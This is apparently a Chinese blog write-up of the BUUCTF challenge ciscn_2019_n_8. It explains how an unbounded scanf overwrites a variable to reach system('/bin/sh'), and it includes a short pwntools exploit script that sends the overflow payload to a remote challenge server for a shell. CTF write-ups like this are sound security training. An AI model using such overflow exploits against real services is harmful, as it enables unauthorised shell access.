-
ciscn_2019_n_8【BUUCTF】
发现什么保护都开了,这样可能是堆题目或者是字符串漏洞,IDA查看代码:int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] var[13] = 0; var[14] = 0; init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5); if ( *(_QWORD *)&var[13] ) { if ( *(_QWORD *)&var[13] == 17LL ) system("/bin/sh"); else printf( "something wrong! val is %d", var[0], var[1], var[2], var[3], var[4], var[5], var[6], var[7], var[8], var[9], var[10], var[11], var[12], var[13], var[14]); }else{ printf("%s, Welcome!\n", var); puts("Try do something~"); } return 0; }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
很明显,只要var[13]==17就行,而scanf()又不限制长度,则直接全部输入17就行
exp:from pwn import * # io = process("./ciscn_2019_n_8") io = remote("node4.buuoj.cn",26959) payload = p32(17)*14 io.sendlineafter("What's your name?\n",payload) io.interactive()- 1
- 2
- 3
- 4
- 5
- 6
-
相关阅读:
Spring整合RabbitMQ-配制文件方式-1-消息生产者
【MyBatis笔记06】MyBatis中的三种关联查询方式(一对一、一对多、多对多)
WGCNA分析教程五 | [更新版]
CSS通用样式4——工具类
力扣labuladong一刷day8共2题
docker-compose部署mysql5.7主从
阿里一面,说说你知道消息中间件的应用场景有哪些?
共创品牌强农精品培育消费引领 国稻种芯百团计划行动发布
springboot+新冠疫苗预约管理系统 毕业设计-附源码241530
JVM垃圾回收机制
- 原文地址:https://blog.csdn.net/qq_41696518/article/details/126549866
